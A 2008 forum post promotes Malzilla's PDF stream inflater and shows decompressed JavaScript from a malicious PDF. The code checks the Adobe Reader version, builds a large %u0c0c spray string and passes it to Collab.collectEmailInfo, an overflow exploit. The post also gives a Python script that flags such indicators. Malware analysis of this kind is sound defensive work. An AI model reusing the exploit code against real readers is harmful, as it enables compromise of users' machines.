
Analyzing Malicious PDFs


joren
October 3rd, 2008, 12:50
The author of Malzilla released a tool recently titled 'PDF streams inflater'. It takes zlib compressed streams, decompresses them, and reveals the output.

If you open a PDF file in a text editor these areas are denoted like so:

Code:
stream
xœ¥Wmoâ:þ¾Òþ‡¨Ò®@3í&tŠz©È
…..
endstream

It works quite well, as I threw it a malicious PDF I had and received the following output:

Code:
....

// Version gate: only proceeds on Reader 8.x below 8.1.2, 7.0.x, or anything older than 7.
function evil(){
var b=app.viewerVersion.toString();
b=b.replace(/\D/g,'');
var c = new Array(b.charAt(0),b.charAt(1),b.charAt(2));
if((c[0]==8&&((c[1]==1&&c[2]<2)||c[1]<1))||(c[0]==7&&c[1]<1)||(c[0]<7)){
d(); // defined in the part of the stream elided above ("....")
// Build an oversized string by repeated doubling (the extracted copy had the second
// %u0c0c escape rendered as its literal character and the closing paren dropped).
var e=unescape("%u0c0c%u0c0c");
while(e.length<44952)
e+=e;
// ...and hand it to Collab.collectEmailInfo as the msg argument (the overflow noted below).
this.collabStore=Collab.collectEmailInfo({subj: "",msg: e});
}
}

A simple Google search reveals this is an attempt at exploiting an overflow vulnerability in Adobe's JS engine. Overall, a great tool that everyone should throw into their arsenal. Original post and download links can be found here: http://www.woodmann.com/forum/showthread.php?p=77241. This post was made to bring additional publicity to the tool (better keyword search-engine results) and to inform those who only read the woodmann blogs.

Additionally, you can use Pdftk to uncompress page streams as well (support for Linux, Mac OS X, etc.). Link: http://www.accesspdf.com
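As an added example (not part of the original post or of Malzilla), here is a small Python triage script that does what the post describes by hand: it walks every stream/endstream pair, tries to zlib-inflate the body, and flags inflated streams containing the API names seen in the sample above. It uses only the standard library and a constructed sample PDF with one FlateDecode stream holding a harmless JavaScript fragment; the regex approach is a quick first look, not a full PDF parser (other filters and object streams are not handled).

```python
import re
import sys
import zlib

# Constructed sample: a harmless JS fragment using the same API names as the
# post's decoded stream, so the indicator scan has something to match.
SAMPLE_JS = b'var v = app.viewerVersion.toString();\nvar s = unescape("%u0041");\n'
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(SAMPLE_JS)
    + b"\nendstream\nendobj\n"
    b"2 0 obj\n<< /Length 5 >>\nstream\nhello\nendstream\nendobj\n"
)

# Tokens worth a closer look when they show up in an inflated stream.
INDICATORS = (b"app.viewerVersion", b"unescape(", b"Collab.collectEmailInfo", b"/JavaScript")

# stream ... endstream, with optional CR before the newline; DOTALL so binary bodies match.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate_streams(data):
    """One record per stream: offset, whether it inflated, the body, and indicator hits."""
    results = []
    for m in STREAM_RE.finditer(data):
        raw = m.group(1)
        try:
            # decompressobj tolerates trailing bytes after the zlib block
            body, compressed = zlib.decompressobj().decompress(raw), True
        except zlib.error:
            body, compressed = raw, False  # not zlib: keep the raw body for inspection
        hits = [ind.decode() for ind in INDICATORS if ind in body]
        results.append({"offset": m.start(), "compressed": compressed,
                        "body": body, "hits": hits})
    return results


if __name__ == "__main__":
    # Pass a PDF path to scan a real file; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for r in inflate_streams(data):
        tag = "SUSPICIOUS " if r["hits"] else ""
        print(f"{tag}stream @ {r['offset']} inflated={r['compressed']} hits={r['hits']}")
        print(r["body"][:200].decode("latin-1"))
```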